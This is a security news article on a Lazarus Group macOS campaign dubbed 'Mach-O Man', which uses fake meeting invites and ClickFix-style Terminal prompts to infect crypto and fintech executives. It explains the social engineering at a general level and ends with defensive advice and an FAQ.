Lazarus Group Targets Crypto Executives With Fake macOS Meeting Invites

North Korea’s Lazarus Group Is Targeting Crypto Executives With Fake Meeting Invites is back with a macOS malware campaign that looks like boring business paperwork and behaves like a digital mugging. The target set is exactly what you’d expect from a state-backed crypto theft crew: executives, fintech leaders, and anyone else sitting close to the money.

• Campaign: Mach-O Man
• Target: Crypto, fintech, and other high-value executives on macOS
• Method: Fake meeting invites via Telegram
• Disguise: Zoom, Microsoft Teams, and Google Meet impersonation
• Payload: ClickFix-style Terminal command infection
• Impact: Linked to more than $500 million in DeFi thefts

CertiK says the campaign, dubbed Mach-O Man, is tied to North Korea’s Lazarus Group and specifically its Famous Chollima unit. The mechanics are ugly in a very modern way: victims get fake online meeting invitations through Telegram, the invite mimics a familiar platform like Zoom, Microsoft Teams, or Google Meet, and then the target is pushed into a fake “verification” step that tells them to paste a command into Terminal on macOS.

That’s the whole trick. No obvious exploit chain. No dramatic pop-up saying “you have been hacked.” Just a slick piece of social engineering that convinces the victim to run the malware for them. As Natalie Newson, senior blockchain security researcher at CertiK, put it:

“These fake verification steps guide victims through keyboard shortcuts that run a harmful command.”

This is the kind of scam that thrives because it feels normal. People get meeting invites all day. They click links. They follow troubleshooting steps. They paste commands when some fake support page tells them to “verify” their system or fix a connection issue. That playbook is part of what security folks call ClickFix, a scam where the victim is tricked into copying and pasting a malicious command to “fix” a fake problem.

“The page looks real, the instructions seem normal, and the victim initiates the action themselves, which is why traditional security controls often miss it.”

That line is the heart of the problem. Traditional defenses are often tuned to catch malicious files, suspicious links, or obvious phishing pages. But if the victim is the one opening Terminal and running the command, the malware doesn’t have to kick the door in. It gets invited in with a cup of coffee.

How the Mach-O Man campaign works

The fake invite arrives through Telegram, which remains a favorite playground for attackers because it’s fast, familiar, and easy to use as both a delivery channel and a command path. Once the target clicks through, they land on a page that mimics a legitimate meeting workflow. The “problem” is usually some nonsense about verification, connection issues, or setup quirks.

From there, the victim is instructed to enter a command into Terminal. On macOS, Terminal is the built-in command-line tool that lets users interact directly with the system. That’s powerful for engineers and administrators, and dangerous as hell when a scammer is the one giving instructions.

CertiK says the malware then installs a modular payload, meaning it can load different components for different jobs, like stealing passwords, collecting browser data, or maintaining access on the machine. It also profiles the host, establishes persistence, and uses Telegram-based command-and-control — basically the attacker’s remote-control system — to receive instructions and move stolen data around.

One particularly irritating feature: the malware can auto-delete after execution. That makes post-infection investigation harder because the malicious components may already be gone by the time the victim notices something is off. Less evidence, fewer clues, more headaches for defenders. Real charming stuff.

Why crypto executives are in the crosshairs

Crypto and fintech executives are prime targets because they tend to have access to sensitive systems, internal chats, wallet infrastructure, and authentication tools that can unlock far more than a single laptop. A compromised executive device can become a launch pad into company accounts, finance systems, cloud dashboards, or even treasury operations.

There’s also a behavioral angle here: executives are busy, distracted, and constantly fielding meeting requests from strangers. That makes them ideal prey for a scam built around routine business behavior. The attack doesn’t need to look clever; it just needs to look normal.

And yes, macOS is a smart choice for the attackers. Crypto firms and startups often run on Macs, especially in leadership circles, so the threat actors are clearly following the money and the device habits. Linux purists can snicker all they want, but if the executive suite is full of MacBooks, that’s where the malware is going.

What Lazarus is doing beyond one campaign

CertiK says the broader Lazarus-linked push is also tied to more than $500 million stolen from DeFi platforms Drift and KelpDAO in just two weeks. That is not random opportunistic crime. That’s industrial-scale theft.

Lazarus has been associated with crypto theft for years, and the scale is absurd. CertiK puts the group’s total theft since 2017 at around $6.7 billion. North Korea has long used cybercrime as an economic weapon, especially under sanctions pressure, and digital assets are attractive because they can be moved quickly if the victim’s operational security is sloppy enough.

That’s the part a lot of people still don’t want to say out loud: this is not just hacking for bragging rights. It’s state-directed financial extraction. Newson didn’t exactly mince words:

“This isn’t random hacking. It’s a state-directed financial operation running at a scale and speed typical of institutions.”

That sounds dramatic until you look at the numbers. Then it just sounds accurate.

Why this works so well

The genius of this attack is that it hides inside normal workflow. A fake meeting invite is not intrinsically suspicious. A “verification” step can sound like routine IT friction. Pasting a command into Terminal may even feel like a standard support fix to someone under time pressure.

That’s why social engineering remains one of the most effective attack methods in crypto and finance. The technical payload matters, but the real weapon is psychological manipulation. Attackers exploit trust, urgency, habit, and confusion. In plain English: they get people to do the dumb thing for them.

And because the scam looks like a business process rather than a classic phishing email, it can slip past both users and some security tools. The page is polished. The language sounds official. The instructions feel harmless. That’s exactly what makes it dangerous.

What defenders should do

CertiK says it has shared indicators of compromise with the security community. That means warning signs that a device may already be infected, which is useful for defenders scanning for related behavior.

For teams handling crypto, fintech, or other sensitive operations, the practical defense is boring but effective:

• Verify meeting requests through a separate channel before clicking anything.
• Never run a Terminal command from an unverified invite or support page.
• Treat “verification” steps with suspicion, especially if they involve copy-paste commands.
• Limit administrative privileges on executive devices.
• Use hardware security keys where possible.
• Watch for unusual Telegram activity, browser credential theft, and strange downloads on corporate machines.

It’s worth spelling out why browser data matters. Stolen browser data can expose passwords, session cookies, internal tools, and sometimes access to wallets or account dashboards. Once an attacker gets those crumbs, they can often turn them into a full meal.

Crypto is supposed to remove unnecessary gatekeepers, not hand the keys to anyone who sends a polished fake meeting invite. But security in this industry is still far too often built on wishful thinking and “I’d never fall for that” energy. That attitude gets people wrecked.

Key questions and takeaways

What is Mach-O Man?

A macOS malware campaign linked to Lazarus Group that uses fake meeting invites and fake verification steps to trick victims into running malicious commands.

Why is it dangerous?

Because the victim triggers the infection themselves, which makes it harder for conventional security tools to catch in real time.

Who is being targeted?

Crypto executives, fintech leaders, and other high-value professionals likely to receive routine meeting requests.

How does the attack work?

A fake Zoom, Microsoft Teams, or Google Meet invite leads to a convincing page that instructs the user to paste a command into Terminal, which installs malware.

Why is Telegram involved?

Telegram is used as both a delivery channel and a command-and-control path, giving attackers a fast and familiar infrastructure layer.

What is ClickFix?

A social engineering trick where the victim is told to copy and paste a command to “fix” a fake issue, but the command actually runs malware.

How much damage is Lazarus linked to?

CertiK says the broader campaign is tied to more than $500 million stolen from Drift and KelpDAO in two weeks, and around $6.7 billion in total theft since 2017.

What should executives and teams do?

Confirm meeting requests through a second channel, never run unverified commands, and assume any “quick verification” prompt could be a trap.

The ugly truth is that crypto’s biggest weakness is still human beings with admin access and bad habits. Bitcoin and decentralized systems can weaken the choke points of traditional finance, but they do not magically fix sloppy operational security. If anything, they make personal and team discipline even more important. Convenience is often the attack surface, and Lazarus knows exactly where to press.